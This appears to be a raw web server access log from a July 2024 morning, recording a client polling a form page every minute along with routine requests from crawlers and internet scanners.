178.165.188.60 - - [25/Jul/2024:10:51:25 +0200] "GET /entry.php?id=10271&&ser=897424 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897364" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:51:25 +0200] "GET /gui/javascript/form_form.js?1721897485 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897424" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.136 - - [25/Jul/2024:10:51:36 +0200] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/tinymce/skins/lightgray/fonts/readme.md HTTP/1.0" 404 346 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.188.60 - - [25/Jul/2024:10:52:25 +0200] "GET /entry.php?id=10271&&ser=897485 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897424" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:52:25 +0200] "GET /gui/javascript/form_form.js?1721897545 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897485" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:53:25 +0200] "GET /entry.php?id=10271&&ser=897545 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897485" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:53:25 +0200] "GET /gui/javascript/form_form.js?1721897605 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897545" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:54:26 +0200] "GET /entry.php?id=10271&&ser=897605 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897545" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:54:26 +0200] "GET /gui/javascript/form_form.js?1721897666 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897605" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:55:26 +0200] "GET /entry.php?id=10271&&ser=897666 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897605" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:55:26 +0200] "GET /gui/javascript/form_form.js?1721897726 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897666" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
167.94.146.53 - - [25/Jul/2024:10:56:00 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.146.53 - - [25/Jul/2024:10:56:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.53 - - [25/Jul/2024:10:56:04 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.53 - - [25/Jul/2024:10:56:04 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.53 - - [25/Jul/2024:10:56:04 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
178.165.188.60 - - [25/Jul/2024:10:56:26 +0200] "GET /entry.php?id=10271&&ser=897726 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897666" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:56:26 +0200] "GET /gui/javascript/form_form.js?1721897786 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897726" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:57:26 +0200] "GET /entry.php?id=10271&&ser=897786 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897726" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:57:27 +0200] "GET /gui/javascript/form_form.js?1721897846 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897786" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.136 - - [25/Jul/2024:10:58:14 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108091203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.188.60 - - [25/Jul/2024:10:58:27 +0200] "GET /entry.php?id=10271&&ser=897846 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897786" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:58:27 +0200] "GET /gui/javascript/form_form.js?1721897907 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897846" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:59:27 +0200] "GET /entry.php?id=10271&&ser=897907 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=897846" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:10:59:27 +0200] "GET /gui/javascript/form_form.js?1721897967 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897907" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:00:27 +0200] "GET /entry.php?id=10271&&ser=897967 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=897907" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:00:27 +0200] "GET /gui/javascript/form_form.js?1721898027 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=897967" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.136 - - [25/Jul/2024:11:00:35 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12466287.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.188.60 - - [25/Jul/2024:11:01:31 +0200] "GET /entry.php?id=10271&&ser=898027 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=897967" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:01:31 +0200] "GET /gui/javascript/form_form.js?1721898091 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898027" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:02:31 +0200] "GET /entry.php?id=10271&&ser=898091 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=898027" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:02:31 +0200] "GET /gui/javascript/form_form.js?1721898151 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898091" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.136 - - [25/Jul/2024:11:03:29 +0200] "GET /ed-test.2web.at/stats/lang/awstats-se.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.188.60 - - [25/Jul/2024:11:03:31 +0200] "GET /entry.php?id=10271&&ser=898151 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=898091" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:03:32 +0200] "GET /gui/javascript/form_form.js?1721898212 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898151" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:04:32 +0200] "GET /entry.php?id=10271&&ser=898212 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898151" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:04:32 +0200] "GET /gui/javascript/form_form.js?1721898272 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898212" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:05:32 +0200] "GET /entry.php?id=10271&&ser=898272 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898212" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:05:32 +0200] "GET /gui/javascript/form_form.js?1721898332 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:06:32 +0200] "GET /entry.php?id=10271&&ser=898332 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:06:32 +0200] "GET /gui/javascript/form_form.js?1721898392 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898332" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
141.98.11.189 - - [25/Jul/2024:11:07:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
178.165.188.60 - - [25/Jul/2024:11:07:33 +0200] "GET /entry.php?id=10271&&ser=898392 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898332" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:07:33 +0200] "GET /gui/javascript/form_form.js?1721898453 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898392" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:08:33 +0200] "GET /entry.php?id=10271&&ser=898453 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=898392" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:08:33 +0200] "GET /gui/javascript/form_form.js?1721898513 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898453" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
198.235.24.98 - - [25/Jul/2024:11:09:30 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
178.165.188.60 - - [25/Jul/2024:11:09:33 +0200] "GET /entry.php?id=10271&&ser=898513 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=898453" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:09:33 +0200] "GET /gui/javascript/form_form.js?1721898573 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898513" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:10:34 +0200] "GET /entry.php?id=10271&&ser=898573 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898513" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:10:34 +0200] "GET /gui/javascript/form_form.js?1721898634 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898573" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:11:34 +0200] "GET /entry.php?id=10271&&ser=898634 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898573" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:11:34 +0200] "GET /gui/javascript/form_form.js?1721898694 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898634" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:12:34 +0200] "GET /entry.php?id=10271&&ser=898694 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898634" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:12:34 +0200] "GET /gui/javascript/form_form.js?1721898754 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898694" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:13:34 +0200] "GET /entry.php?id=10271&&ser=898754 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898694" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:13:35 +0200] "GET /gui/javascript/form_form.js?1721898815 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898754" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:14:35 +0200] "GET /entry.php?id=10271&&ser=898814 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898754" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:14:35 +0200] "GET /gui/javascript/form_form.js?1721898875 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898814" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:15:35 +0200] "GET /entry.php?id=10271&&ser=898875 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898814" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:15:35 +0200] "GET /gui/javascript/form_form.js?1721898935 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898875" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:16:35 +0200] "GET /entry.php?id=10271&&ser=898935 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898875" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:16:36 +0200] "GET /gui/javascript/form_form.js?1721898995 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898935" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:17:36 +0200] "GET /entry.php?id=10271&&ser=898995 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=898935" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:17:36 +0200] "GET /gui/javascript/form_form.js?1721899056 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=898995" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:18:36 +0200] "GET /entry.php?id=10271&&ser=899056 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=898995" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:18:36 +0200] "GET /gui/javascript/form_form.js?1721899116 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899056" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:19:39 +0200] "GET /entry.php?id=10271&&ser=899116 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899056" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:19:39 +0200] "GET /gui/javascript/form_form.js?1721899179 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899116" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
17.241.75.194 - - [25/Jul/2024:11:20:02 +0200] "GET /viewtopic.php?f=8&t=444&p=3321&sid=54df32ee0ee0f7bf8a54e23511949d55 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
178.165.188.60 - - [25/Jul/2024:11:20:39 +0200] "GET /entry.php?id=10271&&ser=899179 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899116" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:20:39 +0200] "GET /gui/javascript/form_form.js?1721899239 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899179" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:21:40 +0200] "GET /entry.php?id=10271&&ser=899239 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899179" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:21:40 +0200] "GET /gui/javascript/form_form.js?1721899300 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899239" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
80.82.77.202 - - [25/Jul/2024:11:21:53 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch)"
92.249.48.202 - - [25/Jul/2024:11:22:33 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
178.165.188.60 - - [25/Jul/2024:11:22:40 +0200] "GET /entry.php?id=10271&&ser=899300 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899239" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:22:40 +0200] "GET /gui/javascript/form_form.js?1721899360 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899300" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:23:42 +0200] "GET /entry.php?id=10271&&ser=899360 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899300" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:23:43 +0200] "GET /gui/javascript/form_form.js?1721899423 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899360" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:24:43 +0200] "GET /entry.php?id=10271&&ser=899423 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899360" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:24:43 +0200] "GET /gui/javascript/form_form.js?1721899483 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899423" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:25:47 +0200] "GET /entry.php?id=10271&&ser=899483 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899423" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:25:47 +0200] "GET /gui/javascript/form_form.js?1721899547 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899483" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
66.240.205.34 - - [25/Jul/2024:11:26:27 +0200] "Gh0st\xad" 400 383 "-" "-"
178.165.188.60 - - [25/Jul/2024:11:26:51 +0200] "GET /entry.php?id=10271&&ser=899547 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=899483" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:26:52 +0200] "GET /gui/javascript/form_form.js?1721899612 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899547" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
192.3.101.25 - - [25/Jul/2024:11:26:59 +0200] "GET /vpn/index.html HTTP/1.1" 400 504 "-" "-"
178.165.188.60 - - [25/Jul/2024:11:27:56 +0200] "GET /entry.php?id=10271&&ser=899611 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899547" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:27:56 +0200] "GET /gui/javascript/form_form.js?1721899676 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899611" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:28:56 +0200] "GET /entry.php?id=10271&&ser=899676 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899611" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:28:56 +0200] "GET /gui/javascript/form_form.js?1721899736 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899676" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:29:56 +0200] "GET /entry.php?id=10271&&ser=899736 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899676" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:29:57 +0200] "GET /gui/javascript/form_form.js?1721899796 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899736" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:30:57 +0200] "GET /entry.php?id=10271&&ser=899796 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=899736" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:30:57 +0200] "GET /gui/javascript/form_form.js?1721899857 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899796" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:31:57 +0200] "GET /entry.php?id=10271&&ser=899857 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899796" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:31:57 +0200] "GET /gui/javascript/form_form.js?1721899917 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899857" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:32:57 +0200] "GET /entry.php?id=10271&&ser=899917 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899857" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:32:57 +0200] "GET /gui/javascript/form_form.js?1721899977 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899917" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
149.50.103.48 - - [25/Jul/2024:11:33:34 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
178.165.188.60 - - [25/Jul/2024:11:33:58 +0200] "GET /entry.php?id=10271&&ser=899977 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=899917" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [25/Jul/2024:11:33:58 +0200] "GET /gui/javascript/form_form.js?1721900038 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=899977" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
